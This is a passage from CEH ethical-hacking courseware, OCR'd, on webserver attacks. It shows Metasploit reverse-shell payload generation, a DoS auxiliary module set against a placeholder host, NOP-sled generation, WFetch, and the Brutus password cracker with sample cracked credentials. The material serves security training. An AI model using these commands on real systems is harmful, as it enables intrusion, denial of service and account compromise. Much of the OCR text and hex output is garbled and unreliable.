  • 62. Ethical Hacking and Countermeasures Hacking Webservers ; Exam 312-50 Certified Ethical Hacker C om m and P ro m p t msf > use windows/shell reverse tcp msf payload(shell_reverse_tcp) > generate -h Usage: generate [options] Generates a payload. O P T IO N S : -b <opt> The listof characters to avoid:,x00xff' -e <opt> The nameof the encoder module to use. -h Help banner. -o <opt> A comma separated list of options in VAR=VAL format. -s <opt> NOP sled length. -t <opt> The output type: ruby, peri, c, or raw. msf payload(shell reverse tcp) > FIGURE 1 2 .2 3 : M e ta s p lo it P a ylo a d M o d u le Module 12 Page 1661 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 63. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Metasploit Auxiliary Module J CEH M e ta s p lo it's a u x ilia ry m o d u le s can b e u s e d t o p e r fo r m a r b it r a r y , o n e o f f a c tio n s su ch as p o r t s c a n n in g , d e n ia l o f s e rv ic e , a n d e v e n fu z z in g J To ru n a u x ilia ry m o d u le , e ith e r use th e run c o m m a n d , o r use th e e x p l o i t com m and C o m m a n d P ro m p t m s f > m s f a u x ilia r y (m R H O ST m s f [ * ] u s e => d o s / w in d o w s / s m b / m s 0 6 _ 0 3 5 _ m a ils lo t s 0 6 _ 0 3 5 _ m a ils lo t ) > a ils lo t ) > s e t R H O ST 1 . 2 . 3 . 4 1 . 2 . 3 . 4 a u x ilia r y (m M a n g lin g s 0 6 _ 0 3 5 _ m t h e k e r n e l, tw o b y t e s r u n a t a t i m e . . . Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. M e t a s p lo it A u x ilia r y M o d u le Metasploit's auxiliary modules can be used to perform arbitrary, one-off actions such as port scanning, denial of service, and even fuzzing. To run auxiliary module, either use the run command or use the exploit command. Module 12 Page 1662 Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 64. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Metasploit NOPS Module C EH (•rtifwtf I til1(41 Nm Im NOP modules generate a no-operation instructions used fo r blocking o u t buffers Use g e n e r a t e com m and to generate a NOP sled o f an arbitrary size and display it in a given form at OPTIONS: - b < o p t> : The list of characters to avoid: 'x00xff' - h : Help banner. - s < o p t> : The comma separated list of registers to save. - t < o p t> : The output type: ruby, peri, c, or raw m sf n o p (o p ty 2 )> To generate a 50 byte NOP sled that is displayed as a C-style buffer, run the following command: Generates a NOP sled of a given length & □ Comm and P rom pt C om m and P rom pt m sf m s f > u s e x 8 6 / o p ty 2 m s f n o p (o p ty 2 ) > g e n e r a t e n o p (o p ty 2 ) u n s ig n e d char > g e n e ra te b u f [] - t c 50 — " x f 5 x 3 d x 0 5 x l5 x f8 x 6 7 x b a x 7 d x 0 8 x d 6 x 6 - h 6 x 9 f x b 8 x 2 d x b 6 " U s a g e : g e n e r a t e [o p t io n s ] le n g t h M x 2 4 x b e x b l x 3 f x 4 3 x l d x 9 3 x b 2 x 3 7 x 3 5 x 8 4 x d 5 x l4 x 4 0 x b 4 " ‫ ״‬x b 3 x 4 1 x b 9 x 4 8 x 0 4 x 9 9 x 4 6 x a 9 x b 0 x b 7 x 2 f x fd x 9 6 x 4 a x 9 8 " nx 9 2 x b 5 x d 4 x 4 fx 9 1 " ; m sf n o p (o p ty 2 ) > Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. M e t a s p lo it N O P S M o d u le Metasploit NOP modules are used to generate no operation instructions that can be used for padding out buffers. The NOP module console interface supports generating a NOP sled of an arbitrary size and displaying it in a given format. options: -b <opt> The list of characters to avoid: ?x00xff? -h Help banner. -s <opt> The comma separated list of registers to save. -t <opt> The output type: ruby, peri, c, or raw. G e n e r a te s a NOP sled of a given length Module 12 Page 1663 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 65. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker To g e n e r a te a 5 0-byte NOP sled t h a t is displayed as a C-style buffer, run t h e following com m and: msf nop(opty2) > generate -t c 50 unsigned char buf[] = "xf5x3dx05xl5xf8x67xbax7dx08xd6x6 6x9fxb8x2dxb6" "x24xbexblx3fx43xldx93xb2x37x35x8 4xd5xl4x40xb4" "xb3x41xb9x48x04x99x46xa9xb0xb7x2 fxfdx96x4ax98" "x92xb5xd4x4fx91"; msf nop(opty2) > F ig u re 1 2 .2 5 : M e ta s p lo it NOPS M o d u le Module 12 Page 1664 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 66. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Webserver Attack Tools: Wfetch I CEH WFetch allows attacker to fully customize an HTTP request and send it to a Web server to see the raw HTTP request and response data It allows attacker to test the performance of Web sites that contain new elements such as Active Server Pages (ASP) or wireless protocols wfeicfi - wtetcni File Edit View Window Help f l Verb: [GET Advanced Request: ‫ ■ י‬host [localHost | f Di«abled Path Y Authentcation Anoryraam UxrtecfcOT Cornsct Qphcr dctajt U«er; Ckertooc.: r w * Pogtwd: r l_ C 0 J NKp Qoirah. fifth. I- from file A -d P«c5y !race J J |60 P Reu« Log Output [Last Status: 500 Internal Server Error; £> started.... O Puny: WWWConnect::Close(” ","8< © closed source port: 7i98rn © MfVWConnectiConriectriocaihost" ~80')n Q IP = "|::l].Q0"n____________________________ h ttp ://w w w .m icro so ft.co m Copyright © by EG-G(l1ncil. All Rights Reserved. Reproduction is Strictly Prohibited. W e b S e r v e r A t t a c k T o o ls : W f e t c h Source: http://www.microsoft.com Wfetch is a graphical user-interface aimed at helping customers resolve problems related to the browser interaction with Microsoft's IIS web server. It allows a client to reproduce a problem with a lightweight, very HTTP-friendly test environment. It allows for very granular testing down to the authentication, authorization, custom headers, and much more. Module 12 Page 1665 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 67. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker w fetch ‫ ־‬W fe tc h l £1 le £d!t yiew Window Help i) O £ & W fe tc h l y » |GET e t> Host |k> > ca»x * S S ■ j.jEort |drfa‫ »״‬j-JVcr |1 1 Advanced Request Disabled T ] < fromHe ‫־־‬ Palh: |/ .jthertcaboo Aulh l/Vionymoos Connection Connect http d etai Coman | Cipher User -] Ckentcert none | Pajiwd | r Projy Igproxy Go' | ^ J2 I _> J ^80 Tracso--R? Raw rSocket P Reuse Log Output [Last Status: S00 Internal Server Error] ‫►־‬started.... O Proxy; WWWConnect::Close(” ,"80")n £ closed source port 7398rn 4 ) WWWConnect::ConnectClocalhost".8‫<״‬r)n 0 > ‫־08:[1::]־‬n = NUM Ready F ig u re 1 2 .2 6 : W fe tc h S c re e n s h o t Module 12 Page 1666 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 68. Ethical Hacking and Countermeasures Hacking Webservers W e b Exam 312-50 Certified Ethical Hacker P a s s w o r d C r a c k in g T o o l: B r u t u s Source: http://www.hoobie.net Brutus is a remote password cracker's tool. It is available for Windows 9x, NT. and 2000, there is no UNIX version available, although it is a possibility at some point in the future. Brutus was written originally to help check routers for default and common passwords. Features Q HTTP (Basic Authentication) e HTTP (HTML Form/CGI) e POP3 e FTP e SM B Q Telnet Q Multi-stage authentication engine © No user name, single user name, and multiple user name modes 0 Password list, combo (user/password) list and configurable brute force modes Module 12 Page 1667 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 69. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker © Highly customizable authentication sequences © Load and resume position © Import and Export custom authentication types as BAD files seamlessly Q SOCKS proxy support for all authentication types 0 User and password list generation and manipulation functionality © HTML Form interpretation for HTML Form/CGI authentication types 0 Error handling and recovery capability inc. resume after crash/failure B ru tu s - AET2 ‫ ־‬w w w .h o o b ie .n e t/b ru tu s - (Ja nuary 2 0 0 0 ) Eile Iools Target I 1 ‫ם . ־־‬ * Help [10001 ^ Type |HTTP (Basic Auth) j* J Start C le a Connection Options Port [80 * ‫(־‬ Connections 0‫י‬ Tmeout rj‫־‬ 10 ‫ך־ך־‬ r U**Ptoxy Drinc | HTTP (Basic) Options Method |HEAD ]» ] &KeepAJrve Authentication Options W Username Use I- Single Usei Use» Fte ]users txt Pass Mode |W 0»d List Btome | pjg [words bd Browse | Positive Authentication Results Target 100017/ 100017/ HTTP (Basic Auth) HTTP (Basic Auth) Username adrran backup Password academ ic Located and installed 1 authentication ptug-ns Iniiafeng. Target 10.0.0.17 verified Opened user file contamng 6 users Opened password file containing 818 Passwords Maximum number of authentication attempts w J be 4906 Engagng target 10.0.0.17 with HTTP (Basic Auth) T mws<1 »1 w i w » Throttle F ig u re 1 2 .2 7 : B ru tu s S c re e n s h o t Module 12 Page 1668 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.